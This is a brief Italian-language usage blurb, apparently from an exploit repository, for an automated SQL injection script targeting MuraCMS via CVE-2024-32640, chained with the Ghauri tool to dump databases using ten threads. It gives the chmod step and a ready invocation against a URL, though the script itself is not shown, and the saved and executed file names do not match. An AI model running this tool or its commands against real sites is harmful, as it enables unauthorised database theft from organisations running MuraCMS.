
Script di exploit automatizzato per SQL injection per CVE-2024-32640 che prende di mira MuraCMS, con integrazione di Ghauri per il dump del database ed esecuzione multi-thread.
Salva questo script come CVE-2024-32640.sh e rendilo eseguibile:
chmod +x CVE-2024-32640.sh
Esegui usando:
./CVE-2024-32640-SQLI-MuraCMS.sh --url https://example.com/ --ghauri '--dump --threads 10'
@Helltakerc3rb